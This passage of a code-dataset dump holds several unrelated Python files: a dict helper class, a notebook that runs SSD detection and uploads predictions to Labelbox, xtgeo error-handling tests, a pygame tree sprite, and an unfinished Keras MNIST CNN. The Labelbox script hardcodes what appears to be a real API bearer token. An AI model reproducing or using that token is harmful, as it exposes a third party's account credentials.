dict[@key] = @value;\n \"\"\"\n\n self.__setitem__(key, value)\n\n # end def\n\n\n\n def set_item (self, key, value):\n r\"\"\"\n real dict item setter;\n\n sets dict[@key] = @value no matter what it is like;\n \"\"\"\n\n super().__setitem__(key, value)\n\n # end def\n\n\n\n def set_value (self, key, value):\n r\"\"\"\n alias method name for .set(...);\n\n defined only for commodity and for code readability;\n \"\"\"\n\n self.set(key, value)\n\n # end def\n\n\n# end class StructDict\n","repo_name":"muxuezi/tkRAD","sub_path":"core/struct_dict.py","file_name":"struct_dict.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"83"} +{"seq_id":"26989517411","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Object Detection with SSD\n# ### Here we demostrate detection on example images using SSD with PyTorch\n\n# In[192]:\n\n\nimport os\nimport sys\nmodule_path = os.path.abspath(os.path.join('..'))\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nimport torch\nimport torch.nn as nn\nfrom pascal_voc_writer import Writer\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport numpy as np\nimport cv2\nif torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n\nfrom ssd import build_ssd\n\n\n# In[193]:\n\n\nimport json\nfrom graphqlclient import GraphQLClient\nclient = GraphQLClient('https://api.labelbox.com/graphql')\nclient.inject_token('Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJjanVvMG9kOHUzMmV4MDgxNzRxMW8za2ZtIiwib3JnYW5pemF0aW9uSWQiOiJjanVvMG9kOGM0MmVpMDg3MXc1bWJvcjUxIiwiYXBpS2V5SWQiOiJjanVwZGkyOWt3N2hzMDg3MTZ3dTh6ZW1kIiwiaWF0IjoxNTU1NzU2OTIwLCJleHAiOjIxODY5MDg5MjB9._m24Q4hVQKIJZVi61-y7bqw5iX1he37zSca1VmW027g')\n\ndef me():\n res_str = client.execute(\"\"\"\n query GetUserInformation {\n user {\n id\n organization{\n id\n }\n }\n }\n \"\"\")\n\n res = json.loads(res_str)\n return res['data']['user']\n\n\ndef createDataset(name):\n res_str = client.execute(\"\"\"\n mutation CreateDatasetFromAPI($name: String!) {\n createDataset(data:{\n name: $name\n }){\n id\n }\n }\n \"\"\", {'name': name})\n\n res = json.loads(res_str)\n return res['data']['createDataset']['id']\n\n\ndef createProject(name):\n res_str = client.execute(\"\"\"\n mutation CreateProjectFromAPI($name: String!) {\n createProject(data:{\n name: $name\n }){\n id\n }\n }\n \"\"\", {'name': name})\n\n res = json.loads(res_str)\n return res['data']['createProject']['id']\n\n\ndef completeSetupOfProject(project_id, dataset_id, labeling_frontend_id):\n res_str = client.execute(\"\"\"\n mutation CompleteSetupOfProject($projectId: ID!, $datasetId: ID!, $labelingFrontendId: ID!){\n updateProject(\n where:{\n id:$projectId\n },\n data:{\n setupComplete: \"2018-11-29T20:46:59.521Z\",\n datasets:{\n connect:{\n id:$datasetId\n }\n },\n labelingFrontend:{\n connect:{\n id:$labelingFrontendId\n }\n }\n }\n ){\n id\n }\n }\n \"\"\", {\n 'projectId': project_id,\n 'datasetId': dataset_id,\n 'labelingFrontendId': labeling_frontend_id\n })\n\n res = json.loads(res_str)\n return res['data']['updateProject']['id']\n\n\ndef configure_interface_for_project(ontology, project_id, interface_id, organization_id):\n res_str = client.execute(\"\"\"\n mutation ConfigureInterfaceFromAPI($projectId: ID!, $customizationOptions: String!, $labelingFrontendId: ID!, $organizationId: ID!) 
{\n createLabelingFrontendOptions(data:{\n customizationOptions: $customizationOptions,\n project:{\n connect:{\n id: $projectId\n }\n }\n labelingFrontend:{\n connect:{\n id:$labelingFrontendId\n }\n }\n organization:{\n connect:{\n id: $organizationId\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'projectId': project_id,\n 'customizationOptions': json.dumps(ontology),\n 'labelingFrontendId': interface_id,\n 'organizationId': organization_id,\n })\n\n res = json.loads(res_str)\n return res['data']['createLabelingFrontendOptions']['id']\n\n\ndef get_image_labeling_interface_id():\n res_str = client.execute(\"\"\"\n query GetImageLabelingInterfaceId {\n labelingFrontends(where:{\n iframeUrlPath:\"https://image-segmentation-v4.labelbox.com\"\n }){\n id\n }\n }\n \"\"\")\n\n res = json.loads(res_str)\n return res['data']['labelingFrontends'][0]['id']\n\n\ndef create_prediction_model(name, version):\n res_str = client.execute(\"\"\"\n mutation CreatePredictionModelFromAPI($name: String!, $version: Int!) {\n createPredictionModel(data:{\n name: $name,\n version: $version\n }){\n id\n }\n }\n \"\"\", {\n 'name': name,\n 'version': version\n })\n\n res = json.loads(res_str)\n return res['data']['createPredictionModel']['id']\n\ndef attach_prediction_model_to_project(prediction_model_id, project_id):\n res_str = client.execute(\"\"\"\n mutation AttachPredictionModel($predictionModelId: ID!, $projectId: ID!){\n updateProject(where:{\n id: $projectId\n }, data:{\n activePredictionModel:{\n connect:{\n id: $predictionModelId\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'predictionModelId': prediction_model_id,\n 'projectId': project_id\n })\n\n res = json.loads(res_str)\n return res['data']['updateProject']['id']\n\n\n# Make sure you pass in label as string\n# json.dumps(label_json)\ndef create_label(label, project_id, data_row_id):\n res_str = client.execute(\"\"\"\n mutation CreateLabelFromApi($label: String!, $projectId: ID!, $dataRowId: ID!){\n createLabel(data:{\n label:$label,\n secondsToLabel:0,\n project:{\n connect:{\n id:$projectId\n }\n }\n dataRow:{\n connect:{\n id:$dataRowId\n }\n }\n type:{\n connect:{\n name:\"Any\"\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'label': label,\n 'projectId': project_id,\n 'dataRowId': data_row_id\n })\n\n res = json.loads(res_str)\n return res['data']['createLabel']['id']\n\ndef create_prediction(label, prediction_model_id, project_id, data_row_id):\n res_str = client.execute(\"\"\"\n mutation CreatePredictionFromAPI($label: String!, $predictionModelId: ID!, $projectId: ID!, $dataRowId: ID!) {\n createPrediction(data:{\n label: $label,\n predictionModelId: $predictionModelId,\n projectId: $projectId,\n dataRowId: $dataRowId,\n }){\n id\n }\n }\n \"\"\", {\n 'label': label,\n 'predictionModelId': prediction_model_id,\n 'projectId': project_id,\n 'dataRowId': data_row_id\n })\n\n res = json.loads(res_str)\n return res['data']['createPrediction']['id']\n\n\ndef create_datarow(row_data, external_id, dataset_id):\n res_str = client.execute(\"\"\"\n mutation CreateDataRowFromAPI(\n $rowData: String!,\n $externalId: String,\n $datasetId: ID!\n ) {\n createDataRow(data:{\n externalId: $externalId,\n rowData: $rowData,\n dataset:{\n connect:{\n id: $datasetId\n }\n }\n }){\n id\n }\n }\n \"\"\", {\n 'rowData': row_data,\n 'externalId': external_id,\n 'datasetId': dataset_id\n })\n\n res = json.loads(res_str)\n return res['data']['createDataRow']['id']\n\n\n# ## Build SSD300 in Test Phase\n# 1. 
Build the architecture, specifying size of the input image (300),\n# and number of object classes to score (21 for VOC dataset)\n# 2. Next we load pretrained weights on the VOC0712 trainval dataset \n\n# In[194]:\n\n\nnet = build_ssd('test', 300, 21)    # initialize SSD\nnet.load_weights('../weights/ssd300_COCO_20000.pth')\n\n\n# ## Load Image \n# ### Here we just load a sample image from the VOC07 dataset \n\n# In[220]:\n\n\ndef video_to_frames(video, path_output_dir):\n    # extract frames from a video and save to directory as 'x.jpeg' where\n    # x is the frame index\n    vidcap = cv2.VideoCapture(video)\n    count = 0\n    while vidcap.isOpened():\n        success, image = vidcap.read()\n        if success :\n            if count % 100 == 0:\n                cv2.imwrite(os.path.join(path_output_dir, '%d.jpeg') % count, image)\n                count += 1\n            count+=1\n        else:\n            break\n    cv2.destroyAllWindows()\n    vidcap.release()\n#video_to_frames(\"C:/diploma/video.avi\",\"C:/diploma/frames/\")\n#source = 'C:/diploma/ssd-pytorch/frames/'\n#for root, dirs, filenames in os.walk(source):\n#for f in filenames:\nnet = build_ssd('test', 300, 21)    # initialize SSD\nnet.load_weights('../weights/ssd300_COCO_20000.pth')\nfor image_number in [23400,16600,15100,15400,16900,23200,23100,22900,11400,11300,700,600,2500,8300,10500]:\n    image = cv2.imread('C:/diploma/ssd-pytorch/frames/{}.jpeg'.format(image_number), cv2.IMREAD_COLOR)  # uncomment if dataset not downloaded\n    height, width, channels = image.shape\n    #writer = Writer('karpin.jpg',width,height)\n    get_ipython().run_line_magic('matplotlib', 'inline')\n    from matplotlib import pyplot as plt\n    from data import VOCDetection, VOC_ROOT, VOCAnnotationTransform\n    # here we specify year (07 or 12) and dataset ('test', 'val', 'train') \n    #testset = VOCDetection(VOC_ROOT, [('2007', 'val')], None, VOCAnnotationTransform())\n    #img_id = 97\n    #image = testset.pull_image(img_id)\n    rgb_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n    # View the sampled input image before transform\n    plt.figure(figsize=(10,10))\n    plt.imshow(rgb_image)\n    plt.show()\n    x = cv2.resize(image, (300, 300)).astype(np.float32)\n    x -= (104.0, 117.0, 123.0)\n    x = x.astype(np.float32)\n    #x = x[:, :, ::-1].copy()\n    plt.imshow(x)\n    x = torch.from_numpy(x).permute(2, 0, 1)\n    xx = Variable(x.unsqueeze(0))     # wrap tensor in Variable\n    if torch.cuda.is_available():\n        xx = xx.cuda()\n    y = net(xx)\n    from data import VOC_CLASSES as labels\n    top_k=10\n\n    plt.figure(figsize=(10,10))\n    colors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\n    plt.imshow(rgb_image)  # plot the image for matplotlib\n    currentAxis = plt.gca()\n\n    detections = y.data\n    # scale each detection back up to the image\n    scale = torch.Tensor(rgb_image.shape[1::-1]).repeat(2)\n    data = [{\n            \"prediction_label\": {\n                \"person\": [\n                ]\n            },\n            \"image_url\": \"http://192.168.1.48:8000/{}.jpeg\".format(image_number),\n            \"external_id\": \"local_image{}\".format(image_number)\n        }\n    ]\n    for i in range(detections.size(1)):\n        j = 0\n        while detections[0,i,j,0] >= 0.6:\n            #print(detections[0,i,j,0])\n            score = detections[0,i,j,0]\n            label_name = labels[i-1]\n            display_txt = '%s: %.2f'%(label_name, score)\n            pt = (detections[0,i,j,1:]*scale).cpu().numpy()\n            coords = (pt[0], pt[1]), pt[2]-pt[0]+1, pt[3]-pt[1]+1\n            data[0]['prediction_label']['person'].append({'geometry':[{\"x\":int(pt[0]),\"y\":int(pt[1]) },\n                                                                      {\"x\": int(pt[2]), \"y\": int(pt[3])}]})\n            color = colors[i]\n            currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n            currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor':color, 
'alpha':0.5})\n            j+=1\n    image_number += 100\n    user_info = me()\n    org_id = user_info['organization']['id']\n\n    project_id = \"cjvak22atnklk0800eifi2yct\"\n    dataset_id = \"cjvaluw3lntxh08006u2jkkjw\"\n\n    interface_id = get_image_labeling_interface_id()\n    ontology = {\n        \"tools\": [\n            {\n                \"color\": \"navy\",\n                \"tool\": \"rectangle\",\n                \"name\": \"Football\"\n            }\n        ]\n    }\n\n    configure_interface_for_project(\n        ontology, project_id, interface_id, org_id)\n    completeSetupOfProject(project_id, dataset_id, interface_id)\n    print('Attached Dataset and Interface to Created Project')\n\n    prediction_model_id = create_prediction_model('Ollie Example Model', 1)\n    attach_prediction_model_to_project(prediction_model_id, project_id)\n\n    print('Created and attached prediction model: %s' % (prediction_model_id))\n\n    for row in data:\n        data_row_id = create_datarow(row['image_url'], row['external_id'], dataset_id)\n        print('Created DataRow: %s' % (data_row_id))\n\n    #    prediction_id = create_prediction(json.dumps(row['prediction_label']), prediction_model_id, project_id, data_row_id)\n        prediction_id = create_label(json.dumps(row['prediction_label']), project_id, data_row_id)\n        print('Created Prediction: %s %s' % (prediction_id, data_row_id))\n\n\n# ## Pre-process the input. \n# #### Using the torchvision package, we can create a Compose of multiple built-in transform ops to apply \n# For SSD, at test time we use a custom BaseTransform callable to\n# resize our image to 300x300, subtract the dataset's mean rgb values, \n# and swap the color channels for input to SSD300.\n\n# In[210]:\n\n\nx = cv2.resize(image, (300, 300)).astype(np.float32)\nx -= (104.0, 117.0, 123.0)\nx = x.astype(np.float32)\n#x = x[:, :, ::-1].copy()\nplt.imshow(x)\nx = torch.from_numpy(x).permute(2, 0, 1)\n\n\n# ## SSD Forward Pass\n# ### Now just wrap the image in a Variable so it is recognized by PyTorch autograd\n\n# In[211]:\n\n\nxx = Variable(x.unsqueeze(0))     # wrap tensor in Variable\nif torch.cuda.is_available():\n    xx = xx.cuda()\ny = net(xx)\n\n\n# ## Parse the Detections and View Results\n# Filter outputs with confidence scores lower than a threshold \n# Here we choose 60% \n\n# In[215]:\n\n\nfrom data import VOC_CLASSES as labels\ntop_k=10\n\nplt.figure(figsize=(10,10))\ncolors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\nplt.imshow(rgb_image)  # plot the image for matplotlib\ncurrentAxis = plt.gca()\n\ndetections = y.data\n# scale each detection back up to the image\nscale = torch.Tensor(rgb_image.shape[1::-1]).repeat(2)\ndata = [{\n        \"prediction_label\": {\n            \"person\": [\n            ]\n        },\n        \"image_url\": \"http://192.168.1.48:8000/{}.jpeg\".format(image_number),\n        \"external_id\": \"local_image\"\n    }\n    ]\nfor i in range(detections.size(1)):\n    j = 0\n    while detections[0,i,j,0] >= 0.6:\n        #print(detections[0,i,j,0])\n        score = detections[0,i,j,0]\n        label_name = labels[i-1]\n        display_txt = '%s: %.2f'%(label_name, score)\n        pt = (detections[0,i,j,1:]*scale).cpu().numpy()\n        coords = (pt[0], pt[1]), pt[2]-pt[0]+1, pt[3]-pt[1]+1\n        data[0]['prediction_label']['person'].append({'geometry':[{\"x\":int(pt[0]),\"y\":int(pt[1]) },\n                                                                  {\"x\": int(pt[2]), \"y\": int(pt[3])}]})\n        color = colors[i]\n        currentAxis.add_patch(plt.Rectangle(*coords, fill=False, edgecolor=color, linewidth=2))\n        currentAxis.text(pt[0], pt[1], display_txt, bbox={'facecolor':color, 'alpha':0.5})\n        j+=1\n\nuser_info = me()\norg_id = user_info['organization']['id']\n\nproject_id = \"cjvak22atnklk0800eifi2yct\"\ndataset_id = \"cjvaluw3lntxh08006u2jkkjw\"\n\ninterface_id = 
get_image_labeling_interface_id()\nontology = {\n    \"tools\": [\n        {\n            \"color\": \"navy\",\n            \"tool\": \"rectangle\",\n            \"name\": \"Football\"\n        }\n    ]\n    }\n\nconfigure_interface_for_project(\nontology, project_id, interface_id, org_id)\ncompleteSetupOfProject(project_id, dataset_id, interface_id)\nprint('Attached Dataset and Interface to Created Project')\n\nprediction_model_id = create_prediction_model('Ollie Example Model', 1)\nattach_prediction_model_to_project(prediction_model_id, project_id)\n\nprint('Created and attached prediction model: %s' % (prediction_model_id))\n\nfor row in data:\n    data_row_id = create_datarow(row['image_url'], row['external_id'], dataset_id)\n    print('Created DataRow: %s' % (data_row_id))\n\n#    prediction_id = create_prediction(json.dumps(row['prediction_label']), prediction_model_id, project_id, data_row_id)\n    prediction_id = create_label(json.dumps(row['prediction_label']), project_id, data_row_id)\n    print('Created Prediction: %s %s' % (prediction_id, data_row_id))\n#writer.addObject('label_name', int(pt[0]), int(pt[1]), int(pt[2]), int(pt[3])) \n#writer.save('golovin.xml')\n\n\n# In[165]:\n\n\nfor i in range(1,3):\n    print(i)\n    \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AlexanderSlav/Diploma","sub_path":"ipynb.py","file_name":"ipynb.py","file_ext":"py","file_size_in_byte":16155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"41928956961","text":"import io\nimport os\nimport stat\n\nimport numpy as np\nimport pytest\n\nimport xtgeo\nfrom xtgeo.cxtgeo import _cxtgeo\n\n\n@pytest.fixture()\ndef unreadable_file(setup_tmpdir):\n    fname = \"random_file_name\"\n    with open(fname, \"w\"):\n        pass\n    os.chmod(fname, stat.S_IREAD)\n    # On some systems the chmod fails, meaning we are able to write to the\n    # file. 
In those cases we skip the test:\n if os.access(fname, os.W_OK):\n pytest.skip(\"Have write access to file\")\n yield fname\n os.chmod(fname, stat.S_IWRITE)\n os.remove(fname)\n\n\ndef test_grdcp3d_get_xyz():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Errors in array lengths checks in grdcp3d_calc_xyz\",\n ):\n xv, yv, zv = _cxtgeo.grdcp3d_calc_xyz(\n 1,\n 1,\n 1,\n np.array([0.0]),\n np.array([1.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n 0, # option\n 1, # len(xv) / yv / zv\n 1,\n 1,\n )\n\n\ndef test_grdcp3d_from_cube():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Bug in: grdcp3d_from_cube\",\n ):\n _cxtgeo.grdcp3d_from_cube(\n 1,\n 1,\n 1,\n np.array(\n [\n [\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n ]\n ]\n ),\n np.array(\n [\n [\n [\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n [0.0, 0.0, 0.0, 0.0],\n ]\n ]\n ],\n dtype=np.float32,\n ),\n np.array(\n [[[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]]], dtype=np.int32\n ),\n 1.0,\n 1.0,\n 1.0,\n -1,\n 1,\n 1,\n 0.0,\n 0,\n 1,\n )\n\n\n@pytest.mark.parametrize(\"func\", [_cxtgeo.x_ic2ijk, _cxtgeo.x_ib2ijk])\ndef test_calc_i_to_ijk(func):\n with pytest.raises(\n xtgeo.XTGeoCLibError, match=f\"Critical error in: {func.__name__}\"\n ):\n func(0, 3, 4, 5, 2)\n\n\ndef test_export_grid_cornerpoint_roxapi_v1():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Errors in array lengths checks in grd3d_conv_grid_roxapi\",\n ):\n _cxtgeo.grd3d_conv_grid_roxapi(\n 1,\n 1,\n 1,\n np.array([0.0]),\n np.array([1.0]),\n np.array([1], dtype=np.int32),\n 1,\n 1,\n 1,\n )\n\n\ndef test_surf_export_petromod_exception_no_file():\n with pytest.raises(\n xtgeo.XTGeoCLibError, match=\"Cannot open file in: surf_export_petromod_bin\"\n ):\n _cxtgeo.surf_export_petromod_bin(\n None,\n \"not_relevant\",\n [1],\n )\n\n\ndef test_surf_export_petromod_exception():\n gfile = xtgeo._XTGeoFile(io.BytesIO(b\"\\x00\"))\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Error writing to Storm format. 
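These tests lean on pytest.raises(..., match=...): the match argument is a regular expression that pytest re.search-es against the string form of the raised exception. A self-contained illustration of the pattern; FakeCLibError is a stand-in class for this sketch, not xtgeo's real exception:

import pytest

class FakeCLibError(Exception):
    pass

def failing_call():
    raise FakeCLibError("Errors in array lengths checks in grdcp3d_calc_xyz")

def test_match_is_treated_as_a_regex():
    # Any substring match of the regex passes; regex metacharacters need
    # escaping, which is why several tests above use r"..." literals.
    with pytest.raises(FakeCLibError, match=r"array lengths checks"):
        failing_call()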
Bug in: surf_export_petromod_bi\",\n ):\n _cxtgeo.surf_export_petromod_bin(\n gfile.get_cfhandle(),\n \"not_relevant\",\n [1, 2],\n )\n\n\n# @pytest.mark.xfail(reason=\"Quite hard to make test case\")\n# def test_grd3d_ecl_tsteps():\n# gfile = xtgeo._XTGeoFile(io.BytesIO(b\"\\x00\"))\n# seq = _cxtgeo.new_intarray(10)\n# day = _cxtgeo.new_intarray(10)\n# mon = _cxtgeo.new_intarray(10)\n# yer = _cxtgeo.new_intarray(10)\n#\n# with pytest.raises(\n# xtgeo.XTGeoCLibError,\n# match=\"Fail in dimensions in \",\n# ):\n# _cxtgeo.grd3d_ecl_tsteps(\n# gfile.get_cfhandle(),\n# seq,\n# day,\n# mon,\n# yer,\n# 10,\n# )\n\n\n@pytest.mark.parametrize(\n \"bytestring, mx, expected_msg\",\n [\n (b\"\\x00\", 1, r\"mx \\* my != nsurf\"),\n (b\"\\x00\\x00\", 2, \"Failed to read file in: surf_import_petromod_bin\"),\n (b\"\\x00\\x00\\x00\\x00\", 2, \"Error when reading file in:\"),\n ],\n)\ndef test_surf_import_petromod_bin(bytestring, mx, expected_msg):\n gfile = xtgeo._XTGeoFile(io.BytesIO((bytestring)))\n with pytest.raises(xtgeo.XTGeoCLibError, match=expected_msg):\n _cxtgeo.surf_import_petromod_bin(gfile.get_cfhandle(), 1, 0.0, mx, 2, 4)\n\n\ndef test_surf_sample_grd3d_lay():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Errors in array lengths checks in:\",\n ):\n _cxtgeo.surf_sample_grd3d_lay(\n 1,\n 1,\n 1,\n np.array([0.0]),\n np.array([1.0]),\n np.array([1], dtype=np.int32),\n 1,\n 1,\n 1,\n 1,\n 1.0,\n 1.0,\n 1.0,\n 1.0,\n np.array([0.0]),\n np.array([0.0]),\n np.array([0.0]),\n 1,\n )\n\n\ndef test_grd3d_read_eclrecord():\n with pytest.raises(xtgeo.XTGeoCLibError, match=\"Cannot use file\"):\n _cxtgeo.grd3d_read_eclrecord(\n None,\n 1,\n 1,\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.float32),\n np.array([1], dtype=np.float64),\n )\n\n\ndef test_grd3d_reduce_onelayer():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"IFLAG other than 0 not implemented\",\n ):\n _cxtgeo.grd3d_reduce_onelayer(\n 0,\n 0,\n 0,\n np.array([0.0]),\n np.array([1.0]),\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.int32),\n _cxtgeo.new_intarray(1),\n 1,\n )\n\n\ndef test_grd3d_points_ijk_cells_nxvec():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=r\"nxvec != nyvec or nyvec != nzvec\",\n ):\n carr = [_cxtgeo.new_doublearray(1) for _ in range(4)]\n [_cxtgeo.swig_numpy_to_carr_1d(np.array([1.0]), arr) for arr in carr]\n\n _cxtgeo.grd3d_points_ijk_cells(\n np.array([1.0], dtype=np.float64),\n np.array([0.0, 0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n 1,\n 1,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 1,\n carr[0],\n carr[1],\n carr[2],\n carr[3],\n 1,\n 1,\n 1,\n np.array([0.0], dtype=np.float32),\n np.array([1.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([0.0], dtype=np.float64),\n 1,\n 1,\n 1,\n 1,\n )\n\n\ndef test_grd3d_points_ijk_cells_nivec():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=r\"nivec != njvec or nivec != nkvec\",\n ):\n carr = [_cxtgeo.new_doublearray(1) for _ in range(4)]\n [_cxtgeo.swig_numpy_to_carr_1d(np.array([1.0]), arr) for arr in carr]\n\n _cxtgeo.grd3d_points_ijk_cells(\n np.array([1.0], dtype=np.float64),\n np.array([0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n 1,\n 1,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 0.0,\n 1,\n carr[0],\n carr[1],\n carr[2],\n carr[3],\n 1,\n 1,\n 1,\n np.array([0.0], dtype=np.float32),\n np.array([1.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([0.0], dtype=np.float64),\n 1,\n 2,\n 1,\n 1,\n )\n\n\ndef test_grd3cp3d_xtgformat1to2_geom():\n with 
pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Error in: grd3cp3d_xtgformat1to2_geom, ib != nzcorn2\",\n ):\n _cxtgeo.grd3cp3d_xtgformat1to2_geom(\n -1,\n -1,\n -1,\n np.array([0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([0.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.int32),\n )\n\n\ndef test_grd3cp3d_xtgformat2to1_geom():\n with pytest.raises(\n xtgeo.XTGeoCLibError,\n match=\"Error in grd3cp3d_xtgformat2to1_geom, ib != nzcorn1\",\n ):\n _cxtgeo.grd3cp3d_xtgformat2to1_geom(\n -1,\n -1,\n -1,\n np.array([0.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([1.0], dtype=np.float64),\n np.array([0.0], dtype=np.float32),\n np.array([1], dtype=np.int32),\n np.array([1], dtype=np.int32),\n )\n","repo_name":"equinor/xtgeo","sub_path":"tests/test_etc/test_clib_errors.py","file_name":"test_clib_errors.py","file_ext":"py","file_size_in_byte":9217,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"83"} +{"seq_id":"27896472268","text":"from Point3D import*\nfrom GameObject import*\nfrom GlobeObject import*\nimport pygame\nimport pygame.gfxdraw\nimport math\nimport random\n\nclass Plant(GlobeObject):\n def __init__(self, groups):\n super(Plant, self).__init__(groups)\n\n def grow(self):\n pass\n\n\nclass Tree(Plant):\n def __init__(self, charAngle, globeRadius,screen, sun, groups):\n self.groups = groups\n self.sun = sun\n\n self.treeHeight = 10\n self.distance = globeRadius+self.treeHeight\n self.radius, self.refRadius, self.tempRadius = 20, 20, 20#radius for drawing the frame,\n #radius for changing the radius of the object\n #radius for drawing the radius\n\n self.angle1, self.angle2= charAngle, 90\n self.fov = self.viewer_distance * self.distance\n self.screen = screen\n self.point3D = Point3D(self.angle1, self.angle2)\n self.x, self.y = self.point3D.project(self.screen.get_width(), \n self.screen.get_height(), self.fov, self.viewer_distance)\n self.z = self.point3D.z\n self.lightColor = (255,230,91)\n \n\n super(Tree, self).__init__( groups)\n self.addLight(sun)\n\n def draw(self):\n\n self.createNewSurface()\n self.updateRadius()\n #self.decreaseRadius()\n self.radius = self.tempRadius\n self.drawTrunk()\n \n pygame.gfxdraw.filled_circle(self.image, self.radius, self.radius, int(self.tempRadius), (130,242,158))\n self.drawTrunk()\n self.drawLight()\n\n def drawTrunk(self):\n self.trunkDist = self.globeRadius-20\n self.trunkfov = self.viewer_distance * self.trunkDist\n self.trunkX, self.trunkY = self.point3D.project(self.screen.get_width(), \n self.screen.get_height(), self.trunkfov, self.viewer_distance)\n\n\n pygame.draw.line(self.screen, (244,158, 66), (self.x, self.y), (self.trunkX, self.trunkY), 3)\n\n def decreaseRadius(self):\n self.refRadius -= 0.1 \n\n def rotate(self, angle, dir, speed):\n self.fov = self.viewer_distance * self.radius\n Globe.rotate(self, angle, dir, speed)\n\n self.fov = self.viewer_distance * self.distance\n super(Tree, self).rotate(angle, dir, speed)\n\n","repo_name":"CandiaGu/Globe","sub_path":"src/Plant.py","file_name":"Plant.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37893814229","text":"import tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPool2D\nfrom tensorflow.keras.layers import 
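The Tree class above maps points on the globe to screen space via Point3D.project(width, height, fov, viewer_distance). That module is not included in this record, so the following is only a sketch of the usual perspective-divide formulation such helpers implement, not the project's actual code:

def project(x, y, z, width, height, fov, viewer_distance):
    # Points farther away (larger z) are scaled down more.
    factor = fov / (viewer_distance + z)
    # Centre the origin in the window; screen y grows downwards,
    # hence the sign flip on y.
    sx = x * factor + width / 2
    sy = -y * factor + height / 2
    return sx, sy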
Flatten\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import load_model\n\ndef load_dataset(online=False):\n    if online:\n        (tr_data, tr_label), (te_data, te_label) = tf.keras.datasets.mnist.load_data()\n    else:\n        path = \"mnist.npz\"\n        (tr_data, tr_label), (te_data, te_label) = tf.keras.datasets.mnist.load_data(path)\n\n    print(tr_data.shape)\n    print(te_data.shape)\n\n    return (tr_data, tr_label), (te_data, te_label)\n\n\ndef make_model():\n    model = Sequential()\n    model.add(Conv2D(filters=32, kernel_size=(5, 5), strides=(1, 1),\n                     activation=\"relu\",\n                     input_shape=(28, 28, 1),\n                     padding=\"same\"))\n    model.add(MaxPool2D(pool_size=(2, 2), strides=(2, 2)))\n    model.add(Conv2D(64, (5, 5), activation=\"relu\", padding=\"same\"))\n    model.add(MaxPool2D(pool_size=(2, 2), strides=(2, 2)))\n    model.add(Flatten())\n    model.add(Dense(1000, activation=\"relu\"))\n    model.add(Dense(10, activation=\"softmax\"))\n    model.summary()\n\n    model.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\",\n                  metrics=[\"accuracy\"])\n\n    return model\n\n# Hyperparameters\nMY_EPOCH = 5\nMY_BATCHSIZE = 200\ndef train(model, x, y):\n    model.fit(x, y, epochs=MY_EPOCH, batch_size=MY_BATCHSIZE)\n    filename = \"cnn_filter32.h5\"\n    model.save(filename)\n\nif __name__ ==\"__main__\":\n    (train_data, train_label), (test_data, test_label) = load_dataset()\n\n    train_data = train_data.reshape(train_data.shape[0], 28, 28, 1)\n    train_data = train_data.astype(\"float32\")\n    train_data /= 255\n\n    train_label = tf.keras.utils.to_categorical(train_label, 10)\n\n    cnn = make_model()\n    # train(cnn, train_data, train_label)\n\n    test_data = test_data.reshape(test_data.shape[0], 28, 28, 1)\n    test_data = test_data.astype(\"float32\")\n    test_data /= 255\n    test_label = tf.keras.utils.to_categorical(test_label, 10)\n\n    filename = 